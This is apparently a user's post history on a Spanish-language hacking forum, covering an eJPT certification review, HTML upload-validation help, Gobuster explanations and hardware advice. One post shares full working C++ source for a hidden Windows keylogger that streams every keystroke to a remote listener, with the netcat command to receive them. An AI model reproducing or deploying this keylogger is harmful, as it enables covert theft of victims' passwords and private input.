Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - Lautaro Villarreal Culic'

Páginas: [1] 2 3 ... 12
1
Hacking / Re: Mi experiencia con la certificación eJPT + consejos
« en: Julio 23, 2021, 03:59:35 am »
Felicidades bro, veo algo de C++ a que nivel se requiere por lo menos estar con este lenguaje
para poder pasarlo sin problemas?, no me llevo mal con C\C++ pero mis conocimientos son basico
he intermedios.

@Sic
Amigo disculpame la demora en responder, no creí que iban a hacerlo sinceramente jajaja
Tranqui que en el examen no se ve nada acerca de programación.
Te enseñan lo básico de c++, haces un ejercicio en el curso (obviamente esta la forma de hacerlo a modo de respuesta paso a paso y explicado como en todos los labs del curso). Así que tranqui, si mal no recuerdo en c++ a modo de práctica hay que hacer un keylogger y ejecutarlo en el equipo víctima preparando un puerto de escucha con netcat en el equipo atacante y ya está, pero tranqui que no tenes que programar nada en el examen.

2
Dudas y pedidos generales / Re: Validar campo Imput
« en: Julio 23, 2021, 03:44:11 am »
Hola Rebe! Como estas?

Mira, te comento. Me descargue tu código y lo hice solo en un archivo HTML para que se me haga más cómodo.

No entendí la parte de que "no te permita seguir". Al menos, con este código html que ahora te pasaré, cuando intentas colocar en el botón "Abrir" sin seleccionar ningún archivo no te abre nada, es decir, no hace nada. Directamente no selecciona nada.

Por otro lado, como buenas prácticas, te sugiero que a las validaciones las hagas desde el campo input y no desde un script, por ejemplo, como atributo en el campo input que anteriormente mencionabamos, hay un atributo que se llama "accept".
En el que le pones por ejemplo, si queres que solo se suban imágenes colocas accept="images/*" (el aterisco selecciona todas las imágenes que sean compatibles con HTML, por ejemplo, para que solo puedas subir videos colocas accept="video/*", o podes especificar con accept="video/mp4".
En tu caso, ví que solo queres permitir subir archivos jpg, png y gifs, lo ideal sería colocarle el atributo (como se ve en el código de abajo) lo siguiente: accept="image/,.jpg,.png,.gif" no olvides colocar una , delante de cada extensión.
Así con esto te ahorras hacer la validación mediante un script y de paso evitas algún tipo de fallo de seguridad.
Luego, en el atributo del input "onchange" el return está de más, ya que es redundante. De esta forma, si en la ventana de windows a la hora de seleccionar un archivo, colocas la opción "Todos los archivos (*)" y elijes un .txt, salta el script que vos abajo colocaste.


Código: [Seleccionar]
<html>

    <body>

        <div class="mb-3 fondo">
            <label for="exampleFormControlInput1" class="form-label"><b>Elija una Imagen (2)</b></label>
            <input type="file" class="form-control" name="my_files[]" multiple accept="image/,.jpg,.png,.gif" id="archivoInput" onchange="validarExt()">
        </div>

    <script>
     
            function validarExt()
            {
                var archivoInput = document.getElementById('archivoInput');
                var files = document.getElementById('archivoInput').files;
           
                var archivoRuta = archivoInput.value;
                var extPermitidas = /(.png|.gif|.jpg)$/i;
                if(!extPermitidas.exec(archivoRuta)){
                    alert('Asegurese de haber seleccionado una Imagen');
                    archivoInput.value = '';
                    return false;
                }
                if (!files.length) {
                alert('selecciones un fila !');
                return false;


                }
            }
    </script>

    </body>

</html>

Saludosss

Edit:
Cuidado Rebe con el atributo "multiple" del input, porque si seleccionas un archivo .png y un .txt con la opción "Todos los archivos (*)" te permite subir ambos archivos y se salta la validación

3
Hacking / Mi experiencia con la certificación eJPT + consejos
« en: Julio 16, 2021, 06:57:59 pm »
Buenas underc0ders, quería compartirles mi experiencia con el curso del eJPT (gratuito) y la certificación (200 USD).

El día 13 de Julio por la madrugada obtuve la certificación eJPT, la cual hasta el día de hoy la considero como un primer paso de una serie de certificaciones que tengo planeado seguir.

Esta podemos dividirla en dos partes. La primera es la preparación, esta es opcional, es decir, no es necesario hacerlo para poder rendir el examen, aunque considero que para los que estamos empezando sería una muy buena idea tomar el curso. Ya que es gratuito con el Starter Pass de INE, solo debemos registrarnos https://ine.com/. En cambio la certificación es impartida por eLearnSecurity https://elearnsecurity.com/product/ejpt-certification/, a un costo razonable.



El curso (PTS)
La preparación para el examen se divide en tres partes, Penetration Testing Prerequisites -> Penetration Testing: Preliminary Skills & Programming -> Penetration Testing Basics.

Primera parte


Segunda parte


Tercera parte


Penetration Testing Prerequisites
En esta parte se ve las bases de los protocolos, networking, cookies, routing, etc. Contamos con un lab de Burpsuite, uno de exfiltración de datos, de routing y wireshark.

Debido a que este curso fue hecho en 2015, hay algunas características en herramientas como Burpsuite que no la tenemos hoy en la versión community, como el Spider.

Penetration Testing: Preliminary Skills & Programming
Por otro lado, en la segunda parte veremos (de forma muy básica) programación en C++, Python y Bash.

Las prácticas son muy buenas, aunque si no tenes experiencia en programación puede que se vuelva un poco difícil, ya que tratarás con sockets. En unos de los labs por ejemplo tendrás que hacer un Keylogger en C++.

Penetration Testing Basics
Lo bonito al final y eso INE lo entiende muy bien. En esta última parte veremos metodología de pentesting, escaneos con Nessus, Nmap, enumeraciones, cracking de hashes, explotaciones con Metasploit, google hacking, los verbos HTTP, explotaciones XSS, SQL, etc.

Considero que es muy completa, cada técnica muy bien explicada con su respectiva área de práctica. Teniendo en cuenta que desde hace unos meses este curso está 100% gratuito, no hay nada en lo que se pueda mejorar. Teniendo en cuenta que esta preparación es para personas iniciadas en el Pentesting.

En general...
La duración de este es de 38 horas aproximadamente.

Cada laboratorio contiene un archivo VPN en el que te conectas mediante openVPN con el usuario y clave que INE te proporciona.

Recomiendo tomarlo por más que no le interese hacer la certificación, y más aún si está iniciando en la ciberseguridad (aunque considero que hay mini conceptos que deben conocerse previamente).

El examen (eJPT)
eLearnSecurity es muy generoso con el tiempo de entrega del examen, nos provee 72 horas para responder correctamente un mínimo de 15 preguntas sobre 20. Son preguntas con opciones múltiples de respuesta (multiple choice).

En caso de que les vaya mal no se desanimen porque tendremos una oportunidad de volver a realizar el examen de forma gratuita.

Por más que el examen tenga sus años, todas las herramientas que hoy tenemos actualizadas pueden usarse perfectamente.

El examen puede realizarse con el contenido del curso, no se pondrá en prueba nada que no esté en el PTS.

Tanto INE como eLearnSecurity nos aclaran que no se trata de un CTF, y en cierto modo tienen razón en el caso del examen. Aunque en el PTS parezca que a veces hay que buscarle la vuelta a las soluciones y algunas de estas es difícil de ver en un entorno real (sobre todo en unas de las Black-box labs del final de la tercera parte, donde encontramos credenciales de una base de datos en la respuesta de los Headers).

Algunos consejos
No tengan miedo de ver las soluciones en los laboratorios, estos están hechos para que nosotros aprendamos, no para hacerlo bien a la primera. Hazlos la cantidad de veces que sea necesarias hasta que te quede claro lo que estás haciendo.

  • Lean TODAS las preguntas (y bien) antes de comenzar el examen.
  • Háganse un pequeño .txt con los comandos que usaron en los labs (sobre todo en los últimos 3).
  • Tómate tu tiempo. Si estás atascado ponte a hacer otras cosas y luego vuelve.
  • Asegurate de enumerar bien los hosts y prestar atención a los resultados.
  • Recuerda que para que un pentesting sea exitoso la clave está en recopilar toda la información posible.
  • Si en algún momento tenes la sensación de que algo no tiene sentido, puede que sea lo correcto.

Citar
Claramente esta certificación no hará que te lluevan ofertas de empleo, es más bien una puerta que considero necesario cruzar para seguir con otras certificaciones como el eCPPT, eWPTX, entre otras.

Imagina una escalera de certificaciones, el eJPT es el primer escalón.

Espero que les haya servido, sobre todo si están ingresando al mundo de la ciberseguridad y están buscando algún curso práctico y con un examen  ;D ;D

4
Que respuesta por parte de Facebook tan de pyme Argentina por Dios

5
Dudas y pedidos generales / Re: Al validar no me funciona el POST
« en: Julio 01, 2021, 04:00:17 am »
Hola Rebe como andas?
Tenes el archivo PrimerPost.php?

6
Underc0de / Re: Underc0de en Netflix!
« en: Junio 20, 2021, 07:14:56 pm »
Jjajajajaj increíble!!!!

7
Hacking / Re: Obtener información sobre una IP con zIP
« en: Junio 01, 2021, 09:29:12 am »
Gracias!!  :D

8
Dudas y pedidos generales / Re: que pasa de bajo de un programa?
« en: Mayo 27, 2021, 07:47:58 am »
Hola buenos días, además de lo que dijo blackdrake, me gustaría añadir que simplemente muchos scripts de scanner lo que hacen es comprobar la versión de lo que escanea, en este caso, la versión del cliente de SMB que se está ejecutando. Entonces, el script normalmente comprueba en una lista de versiones de ese programa/OS/servidor/etc y le asigna una vulnerabilidad a cada versión. Luego, dependiendo de la versión se te mostrará X vulnerabilidad.

Saludos

EDIT:
Si tenes acceso a ese script de python y puedes descargarlo, escribes "nano <nombredelscript>" y puedes leer el código fuente.
Ante estas dudas amigo, si queres iniciarte en la seguridad informática, te aconsejo que previamente veas fundamentos de la programación, o lo básico si es posible. Porque entender cómo y por qué funcionan ciertas cosas es fundamental.

9
Hacking / Obtener información sobre una IP con zIP
« en: Mayo 27, 2021, 04:13:28 am »


Hola underc0ders, les comparto una mini herramienta que hice hace unos minutos, la herramienta en cuestión lo que hace es hacer una consulta a una API y te muestra los resultados por consola con información acerca de una IP pública.
Está hecho en Python.

Enlace de Descarga:
Descargar desde Drive

GitHub:
Descargar desde GitHub


Saludos!

10
Hacking / Keylogger en c++
« en: Mayo 10, 2021, 02:50:20 am »
Hola muchachos, estoy repasando algunas cosas en C++ enfocado a la seguridad informática en general y me parece una buena idea dejarles el código de un Keylogger muy simple :D

Código: [Seleccionar]
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

int main(){

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY;

    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;


    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("IP DEL SERVIDOR"); //IP DEL SERVIDOR (Oyente).
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555); //Puerto de comunicación.
    connect(server, (SOCKADDR *)&addr, sizeof(addr));


        while(true){
            Sleep(10);
            for (int KEY = 0x8; KEY < 0xFF; KEY++){
               
                if (GetAsyncKeyState(KEY) == -32767){

                        char buffer[2];
                        buffer[0] = KEY;
                        send(server, buffer, sizeof(buffer), 0);
                }
            }
        }

        closesocket(server);
        WSACleanup();
}


EDIT:
Y si se preguntan... ok, pongo mi IP y el puerto está en el 5555. Como veo las pulsaciones?
Pueden hacerlo con netcat.
En linux, escriben el comando
Código: [Seleccionar]
sudo nc -lvp 5555
Y dejan la sesión abierta.

Saludos!

11
JAJAJAJAJ @AXCESS no seas malo todos nos cargamos nuestro portátil por primera vez. Es parte del camino de aprendizaje  ;D ;D ;D

12
Claro, si tu USB es 3.0 y tu portátil no tiene ningún puerto USB 3.0 y tiene 2.0 la velocidad será la de un 2.0
En caso de que tu puerto SATA (lo cual debes averiguar muy bien eso, porque también hay muchas variedades) también se verá afectada. Por ejemplo, si conseguís un pen 3.0 y unos convertidores de los que comentas con 3.0 (el ejemplo que pasaste en el post original es 3.0) pero en el SATA de tu portátil es de los antiguos, también será menor velocidad.

O sea, llamemos transferencia 1 a la parte USB -> convertidor SATA / puerto USB de tu portátil (cualquiera de las dos opciones) y transferencia 2 a la parte del convertidor SATA a la unidad de destino.

La velocidad final será la de la transferencia 2.
Por ejemplo, en un pendrive USB 3.0 de 600MB/s conectado a un puerto USB 2.0 de 60MB/s, la velocidad del pendrive al puerto TEORICAMENTE serian de 600MB/s, pero la velocidad final, la que vos notarás, serán de 60MB/s. Esto es tanto para los USB como para cualquier medio de almacenamiento a la hora de transferir un archivo.
Pero eso, si aún así decides utilizar ese convertidor a SATA, te sugiero que, sea primero con entrada hembra, segundo, que sea el mismo SATA que la entrada de tu portátil (lee el manual del portátil) y por último, que el conversor venga con un CD de los drivers, o algún manual para que puedas descargarlo o buscar en algún foro acerca de su instalación. Es decir, que no sea genérico.

Saludos

13
Hola amigo, te comento. Primero que nada el artículo no es el que necesitas.
Entiendo que tenes un pendrive, el pendrive tiene un USB macho, que va en un puerto del PC, hembra.
El artículo que pasaste tiene un USB macho, es decir, para insertar. Vos necesitarías algo similar pero para introducir jajaj.

De todos modos, un USB puede utilizarse como un Disco de almacenamiento. Al fin y al cabo son unidades de almacenamiento.
Yo por ejemplo, tengo 2 bahías para colocar discos (HDD - SSD), ambas ocupadas.
Entonces, me conseguí un pendrive de 256GB, el cual en el administrador de particiones de Windows, configuras la unidad del pendrive como una partición de disco. Eso sí, en la BIOS debe estar por debajo del arranque que el SSD/HDD que bootea el windows.

Andar con cables no tiene sentido, a no ser que tengas un ordenador de mesa y dejes el pendrive dentro de la torre.

En resumen, no es necesario comprar algo para hacer un disco un USB si lo configuras como tal.
Si conseguis el mismo aparato pero con entrada HEMBRA USB y no te molesta gastar, intentalo

Cualquier cosa estoy a tu disposición.
Saludos

EDIT: Me di cuenta que, ese artículo, es para colocar un HDD/SSD al puerto SATA y luego conectarlo al portátil con el USB.
En este caso, no sería lo que vos querés tampoco ya que vos queres usar un USB como disco.
Por otro lado tampoco sé si ese artículo tiene un USB macho para conectar un Disco externo mediante el SATA para ordenadores de escritorio.

De todos modos, seguí lo que te recomendé. Configura tu USB como un disco y no compres artilugios. Hay muchas guías.

14
Prueba ver el visor de eventos. Limpia todos los registros, haz la prueba y luego mira eso.
Si aparece algun error pasalo por acá.

Saludos

15
No está a salvo ni de él mismo XD

~ DtxdF

JAJAJAJ totalmente.
Aunque lo que yo creo que solo se la descargó para probarla (en caso de que no la use). Yo por ejemplo, descargué signal y no la usé porque solo tenía 3 contactos jajajaj

16
Dura semanita para PHP

17
Dudas y pedidos generales / Re: Gobuster
« en: Abril 08, 2021, 06:24:18 am »
Así es @animanegra, es por eso que intenté rebuscarla. Pero como mencionas, si le buscamos la quinta pata al gato seguro encontramos soluciones para encontrar las direcciones. Estuve investigando y no encontré soluciones como la gente.

De todos modos @Codigo7809, la mejor forma es tener una buena política de control de accesos. No tiene nada de malo que se sepa que existe un directorio /password, mientras que esté protegido como se debe y no dejes más info que esa por ahí no deberías preocuparte.

Saludos

18
Dudas y pedidos generales / Re: Gobuster
« en: Abril 07, 2021, 07:19:30 pm »
Buenas.
Primero hay que saber cómo funciona Gobuster, lo que hace esta increíble herramienta, es un ataque de fuerza bruta con diccionarios de nombres de carpetas y archivos comunes.
Por ejemplo, tenes la web underc0de.org/foro
Supongamos que @ANTRAX le colocó una carpeta escondida llamada /passwords, si en el diccionario que le colocamos a gobuster se encuentra /passwords nos dará la alerta.
Pero cómo? sencillo, envía solicitudes, y nos muestra como carpetas y archivos todo aquello que no da un 404 Not Found.
Tengamos acceso o no al archivo, gobuster sabe que ahí hay algo porque le dió una respuesta que no es 404.

Una forma de prevenir, aunque no sé realmente si funcionaría, es buscar algun método para frenar estas solicitudes que hace gobuster a las webs. Una especie de anti DDoS para url(?(?(? no se.

Pero viendo cómo funciona Gobuster, la mejor forma es, si queres evitar que salga en los resultados de gobuster es simplemente nombrando el archivo/carpeta de forma que las chances de que el atacante tenga el nombre de la carpeta en su diccionario no esté tú archivo/carpeta.
Ejemplo:
diccionario del atacante.txt
Citar
/password
/admin
/assets
/robots.txt

Supongamos que tu archivo/carpeta que queres ocultar se llame /akjJLK2s2SlQ1SdklgSLq2
las probabilidades de que se encuentre en un diccionario para hacer una enumeración es casi nula.

Espero que te haya servido un poco, saludos!

19
Enorme laburo, muchísimas gracias!
Usemos la info para comprobar los teléfonos de familiares y conocidos. No hagamos cosas malas.

Gracias @blackdrake por tomarte el tiempo organizar por países. Me ahorraste mucho tiempo.


Saludos!

20
Además, sos un usuario nuevo. No sabemos si lo usarás con nosotros jaja

Páginas: [1] 2 3 ... 12